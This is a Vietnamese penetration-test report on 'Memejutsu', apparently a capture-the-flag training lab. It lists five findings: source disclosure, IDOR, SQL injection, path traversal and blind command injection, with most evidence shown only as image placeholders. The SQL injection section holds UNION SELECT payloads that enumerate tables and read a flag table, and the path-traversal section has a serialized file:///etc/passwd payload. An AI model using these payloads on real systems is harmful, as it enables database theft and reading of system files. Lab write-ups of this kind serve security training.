nqh1004

CẢNH BÁO LỖ HỔNG

Ngày 29 tháng 09, 2024

Mô tả:

Báo cáo này mô tả chi tiết quá trình và kết quả kiểm thử ứng dụng Memejutsu được thực hiện bởi Quoc Huy trong tháng 09,2024.

Đối tượng : Trang Web Memejutsu

Thành viên : Quoc Huy

Công cụ : Burp Suite,VS Code

Mục lục

  1. Tổng quan
  2. Phạm vi
  3. Lỗ hổng

    MJ-01-001: Infomation disclosure ability to leaked all source code

    MJ-01-002: Insecure Direct Object Reference (IDOR) Personal information Disclosure

    MJ-01-003:SQL Injection (SQLI) leading to read all database

    MJ-01-004:Path Traversal Due to Insecure Cookie Serialization

    MJ-01-005: Blind OS Command Injection

  4. Kết luận

1. Tổng quan

🔍 Vulnerability Summary

🔴 Critical 🟠 High 🟡 Medium 🟢 Low ⚪ None
1 2 2 0 0

2. Phạm vi

  Môi trường Phiên bản Special privilege Soucre code
Memejutsu Windown      
MacOS   không  

3.Lỗ hổng

MJ-01-001: Infomation disclosure ability to leaked all source code [Medium]

Description and impact

-File robots.txt của mã nguồn được lưu trữ trên server: http://memejutsu-68f6f11c4a.cyberjutsu-lab.tech/ dẫn đến địa chỉ của file backup trên server, kẻ tấn công có thể truy cập vào file robots.txt để có thể đọc được nội dung mã nguồn ứng dụng.

Step to reproduce

image

image

Reconmendations

References https://www.webitservices.com/blog/best-practices-protecting-data-backups/

MJ-01-002: Insecure Direct Object Reference (IDOR) Personal information Disclosure [ Medium]

Description and impact

Step to reproduce

image

image

image

Hoặc ta tạo một trang cá nhân lấy tên khác admin

image

image

image

image

Recommendations

Reference

https://www.imperva.com/learn/application-security/insecure-direct-object-reference-idor/

MJ-01-003:SQL Injection (SQLI) leading to read all database [ HIGH ]

Description and impact

Root cause analysis

image

Step to reproduce

')%20union%20select%20null,version(),null,null,null--+";

image

')%20union%20select%20null,current_database(),null,null,null--+";

image

')%20union%20select%20null,tablename,null,null,null%20from%20pg_tables%20where%20schemaname%20='public'--+";

image

')%20union%20select%20null,column_name,null,null,null%20from%20information_schema.columns%20where%20table_name%20='flag'--+";

image

')%20union%20select%20null,content,null,null,null%20from%20flag--+";

image

Recommendations

References

https://www.hacksplaining.com/signup?next=/prevention/sql-injection

Description and impact

Root cause analysis

image

image

Ta cùng phân tích bên trong file core-service/app/Http/Controllers/Cookie/RandomPost.php

image

Phương thức tĩnh lấy meme ngẫu nhiên từ hàm getMeme

Phương thức này gọi API để lấy danh sách meme và chọn một meme ngẫu nhiên

image

image

Step to reproduce

image

18:"file:///etc/passwd";

image

image

Recommendations

References

https://www.imperva.com/learn/application-security/directory-traversal/

MJ-01-005: Blind OS Command Injection to RCE [ Critical ]

Description and impact

Root cause analysis

image

Step to reproduce

image

image

image

image

image

Recommendations

References

https://snyk.io/blog/command-injection-python-prevention-examples/